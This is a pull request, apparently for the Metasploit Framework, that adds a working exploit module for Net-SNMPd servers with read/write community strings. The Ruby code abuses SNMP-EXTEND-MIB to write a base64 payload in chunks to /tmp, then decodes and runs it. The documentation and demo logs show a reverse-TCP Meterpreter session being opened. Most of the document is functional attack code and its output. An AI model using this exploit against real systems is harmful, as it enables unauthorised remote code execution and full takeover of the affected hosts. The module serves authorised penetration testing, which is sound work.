### PR TITLE
Linux net snmpd rw access

### DIFF
--- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
@@ -1,0 +1,87 @@
+## Vulnerable Application
+
+  This module uses SNMP extension MIBs to enable remote code execution on the Linux Net-SNMPD servers using the 
+  SNMP-EXTEND-MIB.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/snmp/net_snmpd_rw_access`
+  3. Do: `set rhost [IP]`
+  4. Do: `set community [SNMP Community]`
+  5. Do: `set version [SNMP Version]`
+  4. Configure the payload
+  5. Do: `run`
+  6. You should get a session
+
+
+## Example Run
+
+  ```
+  msf > use exploit/linux/snmp/net_snmpd_rw_access 
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
+  rhost => 192.168.1.3
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
+  lhost => 192.168.1.2
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
+  community => private
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
+  version => 2c
+
+  msf exploit(linux/snmp/net_snmpd_rw_access) > show info
+  
+         Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
+       Module: exploit/linux/snmp/net_snmpd_rw_access
+     Platform: 
+         Arch: 
+   Privileged: No
+      License: Metasploit Framework License (BSD)
+         Rank: Normal
+
+  Provided by:
+    Steve Embling at InteliSecure
+
+  Available targets:
+    Id  Name
+    --  ----
+    0   Linux x86
+
+  Basic options:
+    Name       Current Setting  Required  Description
+    ----       ---------------  --------  -----------
+    CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
+    COMMUNITY  private          yes       SNMP Community String
+    FILEPATH   /tmp             yes       file path to write to 
+    RETRIES    1                yes       SNMP Retries
+    RHOST      192.168.1.3      yes       The target address
+    RPORT      161              yes       The target port (UDP)
+    TIMEOUT    1                yes       SNMP Timeout
+    VERSION    2c               yes       SNMP Version <1/2c>
+
+  Payload information:
+    Space: 4096
+
+  Description:
+    This exploit module exploits the SNMP write access configuration 
+    ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to 
+    remote code execution.
+
+  References:
+    https://www.intelisecure.com
+
+  msf exploit(linux/snmp/net_snmpd_rw_access) > run
+
+  [*] Started reverse TCP handler on 192.168.1.2:4444 
+  [*] Writing to NET-SNMP-EXTEND-MIB with given payload
+  [*] Payload generated. Sending in 200 byte chunk increments.
+  [*] Sent chunked executable. Now executing payload
+  [*] Sending stage (849108 bytes) to 192.168.1.3
+  [+] SNMP request timeout (this is promising).
+
+  meterpreter > exit
+  [*] Shutting down Meterpreter...
+ 
+  [*] 192.168.1.3 - Meterpreter session 1 closed.  Reason: User exit
+  ```

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Payload'        =>
           {
-            'Space'    => 4096, #arbitrary, but it seems to max out the size
+            'Space'    => 4096 #arbitrary, but it seems to max out the size
             #'BadChars' => "\x00"
           },
         'Targets'        =>

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -1,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'snmp'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',
+        'Description'    => %q(
+            This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to
+ configure MIB extensions and lead to remote code execution.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => ['Steve Embling at InteliSecure'],
+        'References'     =>
+          [
+            [ 'URL', 'https://www.intelisecure.com']
+          ],
+        'Payload'        =>
+          {
+            'Space'    => 4096, #arbitrary, but it seems to max out the size
+            #'BadChars' => "\x00"
+          },
+        'Targets'        =>
+        [
+          ['Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+          #Not tested on other platforms but confirmed the above works.
+        ],
+        #'DisclosureDate' => "Dec 22 2017",
+        'DefaultTarget'  => 0,
+      )
+    )
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, 'file path to write to ', '/tmp']),
+        OptString.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200])
+      ])
+  end
+
+  def check
+    Exploit::CheckCode::Unsupported
+  end
+
+  #
+  # The exploit method connects and sets:
+  # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
+  # NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable
+  # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments
+  #
+  def exploit
+    @payload_name = "#{rand_text_alpha(5)}"
+    full_path = datastore['FILEPATH'] + '/' + @payload_name
+    payload_exe = Rex::Text.encode_base64(generate_payload_exe)
+    if payload_exe.blank?
+      fail_with(Failure::BadConfig, "Failed to generate the ELF, select a native payload")
+    end
+    print_status("Writing to NET-SNMP-EXTEND-MIB with given payload")
+    comm     = datastore['COMMUNITY'].to_s
+    # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
+    oid_1 = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112'
+    oid_1_value = 4
+    oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'
+    oid_2_value = "/bin/bash"
+    oid_3 = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112'
+    oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'
+    i = 0
+    #vprint_status(payload_exe)
+    chunk_size = datastore['CHUNKSIZE']
+    chunk_size = chunk_size.to_i
+    print_status("Payload generated. Sending in " + chunk_size.to_s + " byte chunk increments.")
+    while i <= payload_exe.length
+      ii = i + chunk_size
+      if ii > payload_exe.length
+        ii = -1
+      end
+      vprint_status(i.to_s + " " + ii.to_s)
+      oid_3_value = "-c \"printf \'"+ payload_exe[i..ii]+"\' >> #{full_path}.1\""
+      vprint_status(oid_3_value)
+      SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
+          vprint_status(manager.get_value("sysDescr.0"))
+          varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
+          varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
+          varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
+          resp = manager.set([varbind1, varbind2, varbind3])
+          vprint_status(manager.get_value(oid_4).to_s)
+      end
+      #Hit same again, first rewrite  appears to remove the MIB, the next reinstates it.
+      SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
+          varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
+          varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
+          varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
+          resp = manager.set([varbind1, varbind2, varbind3])
+          vprint_status(manager.get_value(oid_4).to_s)
+      end
+      i = i + chunk_size + 1
+    end
+    print_status("Sent chunked executable. Now executing payload")
+    #base64 may not be required here and might not be available on all platforms
+    oid_3_value = "-c \"cat #{full_path}.1 | base64 -d > #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};rm {full_path}.1\"" #
+    vprint_status(oid_3_value)
+    SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
+       varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
+       varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
+       varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
+       resp = manager.set([varbind1, varbind2, varbind3])
+       begin
+         status = manager.get_value(oid_4).to_s
+         if status == "noSuchInstance"
+           resp = manager.set([varbind1, varbind2, varbind3])
+           status = manager.get_value(oid_4).to_s
+           print_bad("SNMP is still responsive, this does not look good")
+         end
+         print_status(status)
+       rescue SNMP::RequestTimeout
+         print_good("SNMP request timeout (this is promising).")
+       end
+    end
+    handler
+  end
+end


### PR DESCRIPTION
Adds an exploit for authenticated read/write access on Net-SNMPD.

## Verification
Tested against Ubuntu 16.04
- [ ] Install snmpd `apt-get install snmpd`
- [ ] Add a rw user to the snmpd configuration
- [ ] Restart snmpd service `service snmpd restart`
- [ ] Start `msfconsole`
- [ ] Do: `use exploit/linux/snmp/net_snmpd_rw_access `
- [ ] Set SNMP version `set version 2c`
- [ ] Set R/W Community string, e.g `set community private`
- [ ] Set RHOST
- [ ] Select desired payload
- [ ] `exploit`
- [ ] Verify the shell is returned

## Demo
```
msf > use exploit/linux/snmp/net_snmpd_rw_access 
msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
rhost => 192.168.1.3
msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
community => private
msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
version => 2c
msf exploit(linux/snmp/net_snmpd_rw_access) > show options

Module options (exploit/linux/snmp/net_snmpd_rw_access):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
   COMMUNITY  private          yes       SNMP Community String
   FILEPATH   /tmp             yes       file path to write to 
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.1.3      yes       The target address
   RPORT      161              yes       The target port (UDP)
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    2c               yes       SNMP Version <1/2c>


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(linux/snmp/net_snmpd_rw_access) > show info

       Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
     Module: exploit/linux/snmp/net_snmpd_rw_access
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Steve Embling at InteliSecure

Available targets:
  Id  Name
  --  ----
  0   Linux x86

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
  COMMUNITY  private          yes       SNMP Community String
  FILEPATH   /tmp             yes       file path to write to 
  RETRIES    1                yes       SNMP Retries
  RHOST      192.168.1.3      yes       The target address
  RPORT      161              yes       The target port (UDP)
  TIMEOUT    1                yes       SNMP Timeout
  VERSION    2c               yes       SNMP Version <1/2c>

Payload information:
  Space: 4096

Description:
  This exploit module exploits the SNMP write access configuration 
  ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to 
  remote code execution.

References:
  https://www.intelisecure.com

msf exploit(linux/snmp/net_snmpd_rw_access) > run

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Writing to NET-SNMP-EXTEND-MIB with given payload
[*] Payload generated. Sending in 200 byte chunk increments.
[*] Sent chunked executable. Now executing payload
[*] Sending stage (849108 bytes) to 192.168.1.3
[+] SNMP request timeout (this is promising).

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.3 - Meterpreter session 1 closed.  Reason: User exit

```

